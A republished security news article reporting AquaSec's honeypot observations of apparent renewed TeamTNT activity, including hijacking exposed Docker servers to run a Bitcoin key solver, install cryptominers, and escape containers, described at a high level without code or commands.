Connect with us

Hi, what are you looking for?

Hard News Hard Hitting News Source Global Political News

Cyber Security

TeamTNT hijacking servers to run Bitcoin encryption solvers

Threat analysts at AquaSec have spotted signs of TeamTNT activity on their honeypots since early September, leading them to believe the notorious hacking group is back in action.

TeamTNT announced it was quitting back in November 2021, and indeed, most associated observations since then involved remnants of past infections like automated scripts but no new payloads.

However, the recent attacks bear various signatures linked to TeamTNT and rely on tools previously deployed by the gang, indicating that the threat actor is likely making a comeback.

Targeting Bitcoin encryption

The researchers observed three attack types being used in the allegedly new TeamTNT attacks, with the most interesting one being to use the computational power of hijacked servers to run Bitcoin encryption solvers.

Named “the Kangaroo attack,” due to using Pollard’s Kangaroo WIF solver, the attack scans for vulnerable Docker Daemons, deploys an AlpineOS image, drops a script (“k.sh”), and eventually fetches the solver from GitHub.

The Kangaroo attack diagram
The Kangaroo attack diagram (AquaSec)

Pollard’s Kangaroo interval ECDLP (Elliptic Curve Discrete Logarithm Problem) solver algorithm is an attempt to break SECP256K1 encryption used in Bitcoin’s public-key cryptography.

“It [the algorithm] is designed to run in a distributed fashion since the algorithm breaks the key into chunks and distributes them to various nodes (attacked servers), collecting the results which are then written locally to a text file,” explains AquaSec.

While quantum computing is expected to break existing Bitcoin encryption at some point in the future, it’s considered impossible to achieve it with current machines, but TeamTNT appears willing to try out the theory anyway using other people’s resources.

Possibly, the threat actors are merely experimenting with new attack pathways, payload deployment, and evading detection while performing intensive operations on captured systems, with the Kangaroo attack ticking all boxes.

Other attack types

The other attacks observed by AquaSec are similar to past TeamTNT operations but now feature some novel characteristics.

The “Cronb Attack” uses documented rootkits, cron jobs for persistence, cryptominers for profit, and tools for lateral movement. The novel element is the appearance of new C2 infrastructure addresses and more elaborate data exchange.

The “What Will Be” attack targets Docker Daemons with shell-file dropping Alpine images again, exploiting a vulnerability to escape from the container to the host.

Next, the intruders download and execute additional scripts, rootkits, and a cryptominer, while they also add cronjobs and perform SSH scans on the network.

The What Will Be attack diagram
The “What Will Be” attack diagram (AquaSec)

One new trick in this attack is introduced via those scripts, enabling the threat actors to optimize cryptomining performance by modifying CPU model-specific registers for the architecture.

Optimizing CPU for cryptomining
Optimizing CPU for cryptomining (AquaSec)

Whether it is TeamTNT conducting these attacks or someone else, organizations should ramp up their cloud security, strengthen Docker configuration, and apply all available security updates before it’s too late.

Source: https://www.bleepingcomputer.com/news/security/teamtnt-hijacking-servers-to-run-bitcoin-encryption-solvers/

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Cyber Security

Google has announced the first open-source quantum resilient FIDO2 security key implementation, which uses a unique ECC/Dilithium hybrid signature schema co-created with ETH Zurich....

Cyber Security

Researchers at the RWTH Aachen University in Germany published a study revealing that tens of thousands of container images hosted on Docker Hub contain...

Cyber Security

Security researchers have dissected a recently emerged ransomware strain named ‘Big Head’ that may be spreading through malvertising that promotes fake Windows updates and Microsoft Word...

Cyber Security

A new form of communication on Twitter called the Encrypted Direct Message has been made available by Twitter. It will appear in your inbox...

Copyright © 2023 Hard News Herd Hitting in Your Face News Source | World News | Breaking News | US News | Political News Website by Top Search SEO